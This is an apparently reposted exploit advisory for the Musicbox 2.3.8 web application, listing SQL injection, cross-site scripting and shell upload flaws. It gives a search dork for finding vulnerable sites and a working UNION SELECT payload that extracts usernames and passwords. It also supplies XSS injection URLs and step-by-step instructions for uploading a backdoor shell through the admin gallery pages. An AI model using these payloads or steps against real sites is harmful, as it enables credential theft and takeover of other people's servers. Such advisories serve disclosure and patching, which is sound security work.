Musicbox 2.3.8 Cross Site Scripting & Shell Upload & SQL Injection

2013.08.27
Credit: DevilScreaM
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79
CWE-264
Dork: intext:Musicbox Version OR inurl:genre_albums.php?id=

#Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities #Author : DevilScreaM #Date : 25/08/2013 #Category : Web Applications #Vendor : http://www.musicboxv2.com/ #Version : 1.0 - 2.3.8 #Dork intext:Musicbox Version intext:Musicbox Version 2.3.8 ? 2008 inurl:genre_albums.php?id= #Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability #Tested On : Windows 7 32 Bit (Mozila & Chrome) #Greetz : Newbie-Security.or.id SQL Injection Vulnerability http://site-target/genre_albums.php?id=[SQLI] Example http://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users-- ========================================================================================== Cross site scripting / XSS Vulnerability *Search 1. Go To Fiture Search 2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search 3. See Result or See with URL http://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0 Example http://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0 ======================================================================================== *News Profile 1. Register To Website or go to link http://site-target/register.php 2. Login to Website 3. Go to Menu [ My News ] 4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1> And at Detials input your XSS or Text See your XSS at http://site-target/member.php?uname=[YOUR_USERNAME] Example http://server/musicbox/member.php?uname=devilscream ========================================================================================== Shell Upload Vulnerability *Artist Galery 1. Go to Admin Page, And Login 2. Go to Upload Artist Image or Go to Link http://site-target/admin/adminpanel.php?action=artistgallery 3. Select Your Shell/Backdoor , And Click Submit 4. Result Upload At http://site-target/artist_gallery/Your_Backdoor.php ============================================================================================ *Album Galery 1. Go to Admin Page, And Login 2. Go to Upload Album Image or Go to Link http://site-target/admin/adminpanel.php?action=albumgallery 3. Select Option, Example Option "All Album", And Click Submit 3. Select Your Shell/Backdoor , And Click Submit 4. Result Upload At http://site-target/album_gallery/Your_Backdoor.php ==========================================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top